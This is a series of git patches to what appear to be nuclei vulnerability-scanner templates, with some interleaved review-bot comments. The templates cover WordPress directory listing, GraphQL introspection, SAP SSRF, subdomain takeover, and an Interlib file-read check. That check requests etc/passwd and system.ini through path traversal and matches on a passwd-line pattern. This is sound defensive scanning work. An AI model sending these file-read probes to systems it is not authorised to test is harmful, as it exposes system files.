@@ -1,32 +0,0 @@ -id: wp-uploads-listing - -info: - name: WordPress Upload Directory Listing Enable - author: yashgoti - severity: info - tags: wordpress - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/uploads/" - - "{{BaseURL}}/wp-content/uploads/2015/" - - "{{BaseURL}}/wp-content/uploads/2016/" - - "{{BaseURL}}/wp-content/uploads/2017/" - - "{{BaseURL}}/wp-content/uploads/2018/" - - "{{BaseURL}}/wp-content/uploads/2019/" - - "{{BaseURL}}/wp-content/uploads/2020/" - - "{{BaseURL}}/wp-content/uploads/2021/" - - "{{BaseURL}}/wp-content/uploads/cfdb7_uploads/" - matchers-condition: and - matchers: - - type: word - words: - - "Directory listing for" - - "Index of /" - - "[To Parent Directory]" - - "Directory: /" - - - type: status - status: - - 200 From b6058200cf358e5be45685200ce96f0c32ef81fd Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 4 Jun 2021 15:44:45 +0000 Subject: [PATCH 136/144] Auto Update README [Fri Jun 4 15:44:45 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index d8cdc59cb8..db65ef368a 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 328 | vulnerabilities | 175 | exposed-panels | 146 | +| cves | 328 | vulnerabilities | 174 | exposed-panels | 146 | | takeovers | 67 | exposures | 105 | technologies | 98 | | misconfiguration | 66 | workflows | 32 | miscellaneous | 22 | | default-logins | 30 | exposed-tokens | 0 | dns | 9 | | fuzzing | 9 | helpers | 8 | iot | 13 | -**111 directories, 1206 files**. +**111 directories, 1205 files**. From 1f6334671cd1bd82b246901c75ba41f4257f1733 Mon Sep 17 00:00:00 2001 
From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Fri, 4 Jun 2021 21:26:59 +0530 Subject: [PATCH 137/144] escape fix --- vulnerabilities/other/interlib-fileread.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/other/interlib-fileread.yaml b/vulnerabilities/other/interlib-fileread.yaml index 32be6e4dbb..97641cace9 100644 --- a/vulnerabilities/other/interlib-fileread.yaml +++ b/vulnerabilities/other/interlib-fileread.yaml @@ -11,7 +11,7 @@ requests: - method: GET path: - "{{BaseURL}}/interlib/report/ShowImage?localPath=etc/passwd" - - "{{BaseURL}}/interlib/report/ShowImage?localPath=C:\Windows\system.ini" + - "{{BaseURL}}/interlib/report/ShowImage?localPath=C:\\Windows\\system.ini" matchers-condition: and matchers: From 5d63b1bb05f7dfa04e9f1b6c0bb087a42fdb96fc Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Fri, 4 Jun 2021 21:33:01 +0530 Subject: [PATCH 138/144] Fixing the condition --- vulnerabilities/other/interlib-fileread.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/vulnerabilities/other/interlib-fileread.yaml b/vulnerabilities/other/interlib-fileread.yaml index 97641cace9..11298f21e8 100644 --- a/vulnerabilities/other/interlib-fileread.yaml +++ b/vulnerabilities/other/interlib-fileread.yaml @@ -19,8 +19,8 @@ requests: - type: regex regex: - "root:[x*]:0:0" - - "for 16-bit" - condition: and + - "for 16-bit app support" + condition: or - type: status status: From 7a2f03dcb727f912002d226ea96da21e51faa528 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 4 Jun 2021 16:07:44 +0000 Subject: [PATCH 139/144] Auto Update README [Fri Jun 4 16:07:44 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index db65ef368a..d8cdc59cb8 100644 --- a/README.md +++ b/README.md 
@@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc
 | Templates | Counts | Templates | Counts | Templates | Counts |
 | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- |
-| cves | 328 | vulnerabilities | 174 | exposed-panels | 146 |
+| cves | 328 | vulnerabilities | 175 | exposed-panels | 146 |
 | takeovers | 67 | exposures | 105 | technologies | 98 |
 | misconfiguration | 66 | workflows | 32 | miscellaneous | 22 |
 | default-logins | 30 | exposed-tokens | 0 | dns | 9 |
 | fuzzing | 9 | helpers | 8 | iot | 13 |
-**111 directories, 1205 files**.
+**111 directories, 1206 files**.
From f5addb24c1941d7071ce902232a37da431701951 Mon Sep 17 00:00:00 2001
From: sandeep <8293321+ehsandeep@users.noreply.github.com>
Date: Fri, 4 Jun 2021 23:53:21 +0530
Subject: [PATCH 140/144] misc updates
---
 technologies/{graphql.yaml => graphql-detect.yaml} | 7 +++++--
 1 file changed, 5 insertions(+), 2 deletions(-)
 rename technologies/{graphql.yaml => graphql-detect.yaml} (96%)
diff --git a/technologies/graphql.yaml b/technologies/graphql-detect.yaml
similarity index 96%
rename from technologies/graphql.yaml
rename to technologies/graphql-detect.yaml
index eafbfe26f2..1794593fe9 100644
--- a/technologies/graphql.yaml
+++ b/technologies/graphql-detect.yaml
@@ -1,7 +1,7 @@
-id: graphql
+id: graphql-detect
 info:
- name: GraphQL API
+ name: GraphQL API Detection
 author: NkxxkN & ELSFA7110
 severity: info
@@ -51,6 +51,7 @@ requests:
 headers:
 Content-Type: application/json
+ body: '{"query":"query IntrospectionQuery{__schema {queryType { name }}}"}'
 matchers-condition: and
@@ -58,8 +59,10 @@ requests:
 - type: status
 status:
 - 200
+
 - type: regex
 regex:
 - "__schema"
 - "(Introspection|INTROSPECTION|introspection).*?"
 - ".*?operation not found.*?"
+ condition: or
\ No newline at end of file
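Review bot: The two regex patterns that now sit under the added `condition: or` in the last graphql-detect hunk carry leading and trailing `.*?`, which match nothing in an unanchored search, and the three-way alternation is just a case-insensitive word; `- "(?i)introspection"` and `- "operation not found"` express the same thing and are easier to read. It is also worth recording that the request body added in the previous hunk itself contains `__schema`, so a server that echoes the query back in an error message will satisfy the first regex; a comment such as `# "__schema" may also appear because the server echoes our request body` keeps that in view when someone later tries to tighten the matcher. The request entry these matchers belong to starts outside the hunk.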
From 11cb8b310639fedbfcb9ab83fd2745b4c4cd36e5 Mon Sep 17 00:00:00 2001
From: sandeep <8293321+ehsandeep@users.noreply.github.com>
Date: Sat, 5 Jun 2021 00:00:50 +0530
Subject: [PATCH 141/144] Update CVE-2020-6308.yaml
---
 cves/2020/CVE-2020-6308.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/cves/2020/CVE-2020-6308.yaml b/cves/2020/CVE-2020-6308.yaml
index b29b3eee67..773c79b9af 100644
--- a/cves/2020/CVE-2020-6308.yaml
+++ b/cves/2020/CVE-2020-6308.yaml
@@ -4,7 +4,7 @@ info:
 name: Unauthenticated Blind SSRF in SAP
 author: madrobot
 severity: medium
- description: https://github.com/InitRoot/CVE-2020-6308-PoC
+ reference: https://github.com/InitRoot/CVE-2020-6308-PoC
 tags: cve,cve2020,sap,ssrf
 requests:
From 83d359f6cf21e8481eef21cd1056b67f9d439540 Mon Sep 17 00:00:00 2001
From: sandeep <8293321+ehsandeep@users.noreply.github.com>
Date: Sat, 5 Jun 2021 00:02:33 +0530
Subject: [PATCH 142/144] updating tags
---
 cves/2020/CVE-2020-6308.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/cves/2020/CVE-2020-6308.yaml b/cves/2020/CVE-2020-6308.yaml
index 773c79b9af..a0bb988cd8 100644
--- a/cves/2020/CVE-2020-6308.yaml
+++ b/cves/2020/CVE-2020-6308.yaml
@@ -5,7 +5,7 @@ info:
 author: madrobot
 severity: medium
 reference: https://github.com/InitRoot/CVE-2020-6308-PoC
- tags: cve,cve2020,sap,ssrf
+ tags: cve,cve2020,sap,ssrf,oob
 requests:
 - method: POST
From 8716c7c8a62c9b1bb35461816b45811dbbca7ac0 Mon Sep 17 00:00:00 2001
From: GitHub Action
Date: Fri, 4 Jun 2021 18:35:16 +0000
Subject: [PATCH 143/144] Auto Update README [Fri Jun 4 18:35:16 UTC 2021] :robot:
---
 README.md | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/README.md b/README.md
index d8cdc59cb8..5ed60f9fa1 100644
--- a/README.md
+++ b/README.md
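Review bot: Renaming the key from `description` to `reference` in the first CVE-2020-6308 hunk is correct for a URL, but it leaves the `info` block with no `description` at all, so the template now says nothing about what it detects beyond its name. A one-line entry derived from the name would close that gap, e.g. `description: Unauthenticated blind server-side request forgery in SAP.`, placed after `severity`. The rest of the `info` block and the `requests` section continue outside the hunk.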
@@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc
 | Templates | Counts | Templates | Counts | Templates | Counts |
 | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- |
-| cves | 328 | vulnerabilities | 175 | exposed-panels | 146 |
+| cves | 329 | vulnerabilities | 175 | exposed-panels | 146 |
 | takeovers | 67 | exposures | 105 | technologies | 98 |
 | misconfiguration | 66 | workflows | 32 | miscellaneous | 22 |
 | default-logins | 30 | exposed-tokens | 0 | dns | 9 |
 | fuzzing | 9 | helpers | 8 | iot | 13 |
-**111 directories, 1206 files**.
+**111 directories, 1207 files**.
From ba0d092d4d8dfae79ba02c1259027c7422cc4b3e Mon Sep 17 00:00:00 2001
From: sandeep <8293321+ehsandeep@users.noreply.github.com>
Date: Sat, 5 Jun 2021 09:40:37 +0530
Subject: [PATCH 144/144] Update landingi-takeover.yaml
---
 takeovers/landingi-takeover.yaml | 7 ++++---
 1 file changed, 4 insertions(+), 3 deletions(-)
diff --git a/takeovers/landingi-takeover.yaml b/takeovers/landingi-takeover.yaml
index 19d8cd4a2d..37a3dcec7b 100644
--- a/takeovers/landingi-takeover.yaml
+++ b/takeovers/landingi-takeover.yaml
@@ -3,9 +3,9 @@ id: landingi-takeover
 info:
 name: landingi takeover detection
 author: pdcommunity
- severity: high
+ severity: info
 tags: takeover
- reference: https://github.com/EdOverflow/can-i-take-over-xyz
+ reference: https://github.com/EdOverflow/can-i-take-over-xyz/issues/117
 requests:
 - method: GET
@@ -16,4 +16,5 @@ requests:
 - type: word
 words:
 - It looks like you're lost
- - The page you are looking for is not found
\ No newline at end of file
+ - The page you are looking for is not found
+ condition: and
\ No newline at end of file
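Review bot: The landingi template still ends without a trailing newline after this change (the `\ No newline at end of file` marker is present on the new side of the last hunk), so the next edit to the final line will again show up as a remove-and-re-add instead of a one-line change; add the newline while touching `condition: and`. The drop from `severity: high` to `info` in the first hunk is not explained anywhere in the file, only implied by the updated reference; a comment beside it, `# severity lowered to info - see the referenced issue for the current takeover status`, would save the next reader a trip to the tracker. Requiring both strings with `condition: and` is a sensible tightening of the matcher.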